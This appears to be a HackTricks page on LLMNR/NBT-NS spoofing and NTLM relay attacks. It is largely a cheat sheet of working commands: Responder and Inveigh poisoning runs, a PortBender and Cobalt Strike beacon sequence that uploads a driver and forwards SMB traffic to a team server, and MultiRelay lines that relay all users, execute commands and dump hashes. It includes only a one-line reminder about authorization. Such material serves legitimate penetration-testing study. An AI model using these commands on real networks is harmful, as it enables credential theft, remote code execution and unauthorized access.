Search K
Appearance
Appearance
Other ways to support HackTricks:
/etc/responder/Responder.conf
./usr/share/responder/logs
directory.responder -I <Interface>
responder -I <Interface> -P -r -v
responder -I <Interface> --lm --disable-ess
responder -I <Interface> --wpad
responder.py -I <interface> -Pv
./Responder.py -I eth0 -Pdv
It's crucial to note that employing these techniques should be done legally and ethically, ensuring proper authorization and avoiding disruption or unauthorized access.
Inveigh is a tool for penetration testers and red teamers, designed for Windows systems. It offers functionalities similar to Responder, performing spoofing and man-in-the-middle attacks. The tool has evolved from a PowerShell script to a C# binary, with Inveigh and InveighZero as the main versions. Detailed parameters and instructions can be found in the wiki.
Inveigh can be operated through PowerShell:
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
Or executed as a C# binary:
Inveigh.exe
This attack leverages SMB authentication sessions to access a target machine, granting a system shell if successful. Key prerequisites include:
In scenarios where direct network introduction isn't feasible, traffic on port 445 needs to be forwarded and tunneled. Tools like PortBender help in redirecting port 445 traffic to another port, which is essential when local admin access is available for driver loading.
PortBender setup and operation in Cobalt Strike:
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080
# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
Each tool can be configured to operate through a SOCKS proxy if necessary, enabling attacks even with indirect network access.
MultiRelay is executed from the /usr/share/responder/tools directory, targeting specific IPs or users.
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
These tools and techniques form a comprehensive set for conducting NTLM Relay attacks in various network environments.
In Windows you may be able to force some privileged accounts to authenticate to arbitrary machines. Read the following page to learn how:
Other ways to support HackTricks: